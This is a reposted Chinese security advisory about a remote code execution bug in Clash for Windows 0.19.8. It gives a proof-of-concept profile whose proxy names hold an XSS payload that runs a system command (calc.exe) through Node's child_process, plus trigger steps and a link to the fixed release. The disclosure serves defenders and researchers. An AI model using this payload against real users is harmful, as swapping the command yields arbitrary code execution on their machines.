Clash_for_windows RCE

admin 2022年5月1日19:55:38评论1 views字数 1156阅读3分51秒阅读模式

Clash_for_windows RCE

点击蓝字 关注我们

Clash_for_windows RCE

声明

本文作者:CKCsec安全研究院
本文字数:469

阅读时长:2 分钟

项目/链接:文末获取

本文属于【CKCsec安全研究院】原创文章,未经许可禁止转载

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

crash_for_windows_pkg由 Electron 提供支持。如果 XSS 负载以代理的名义,我们可以远程执行受害者计算机上的任何 JavaScript 代码。

影响版本

0.19.8(0.19.9版本还有(mac目前没发现)

POC

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true

proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

漏洞利用

1、导入POC配置文件 2、切换到"Profiles" 3、单击“Proxies”即可触发Clash_for_windows RCE

修复建议

作者已发布了修复版本,下载更新即可https://github.com/Fndroid/clash_for_windows_pkg/releases

另外关注公众号后台回复“0112”可免费获取代码审计教程后台回复“0110”获取红队攻防内部手册回复“逆向获取逆向教程。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,CKCsec安全研究院以及文章作者不为此承担任何责任。

CKCsec安全研究院有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(CKCsec安全研究院):Clash_for_windows RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月1日19:55:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Clash_for_windows RCEhttps://cn-sec.com/archives/968539.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息